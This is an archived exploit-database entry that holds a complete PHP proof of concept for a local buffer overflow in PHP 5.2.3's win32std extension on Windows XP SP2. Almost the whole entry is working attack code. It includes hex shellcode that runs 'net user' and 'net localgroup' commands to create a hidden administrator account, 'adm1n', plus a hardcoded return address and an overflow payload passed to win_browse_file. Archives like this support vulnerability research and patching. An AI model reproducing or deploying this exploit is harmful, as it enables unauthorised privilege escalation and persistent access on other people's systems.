PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)

EDB-ID:

4303

Author:

NetJackal

Type:

local

Platform:

Windows

Published:

2007-08-22

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>

# milw0rm.com [2007-08-22]